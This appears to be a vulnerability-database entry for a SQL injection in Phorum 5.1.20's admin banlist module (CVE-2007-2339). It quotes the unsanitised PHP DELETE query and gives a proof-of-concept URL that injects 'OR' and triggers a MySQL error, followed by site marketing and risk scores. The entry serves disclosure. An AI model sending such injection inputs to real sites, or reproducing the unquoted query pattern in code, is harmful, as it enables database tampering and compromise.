Phorum 5.1.20 - 'admin.php' badwords/banlist Module SQL Injection
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2007-2339 | 27 Apr 200716:00 | – | cve | |
| CVE-2007-2339 | 27 Apr 200716:00 | – | cvelist | |
| Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection | 23 Apr 200700:00 | – | exploitdb | |
| Phorum 5.1.20 - 'admin.php' Groups Module Edit/Add Group Field SQL Injection | 23 Apr 200700:00 | – | exploitdb | |
| EUVD-2007-2334 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-2339 | 27 Apr 200716:19 | – | nvd | |
| Sql injection | 27 Apr 200716:19 | – | prion |
source: https://www.securityfocus.com/bid/23616/info
Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation.
Phorum 5.1.20 is affected; prior versions may also be vulnerable.
> From source code - "include/db/mysql.php" line 3223:
--------------------------------------------------
function phorum_db_del_banitem($banid) {
$PHORUM = $GLOBALS["PHORUM"];
$conn = phorum_db_mysql_connect();
$sql = "DELETE FROM {$PHORUM['banlist_table']} WHERE id = $banid";
$res = mysql_query($sql, $conn);
---------------------------------------------------
PoC: http://localhost/phorum.5.1.20/admin.php?module=banlist&delete=1&curr=OR
... and we will get error message:
<!-- You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near
'OR' at line 1: DELETE FROM phorum_banlists WHERE id = OR -->Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Nov 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.01872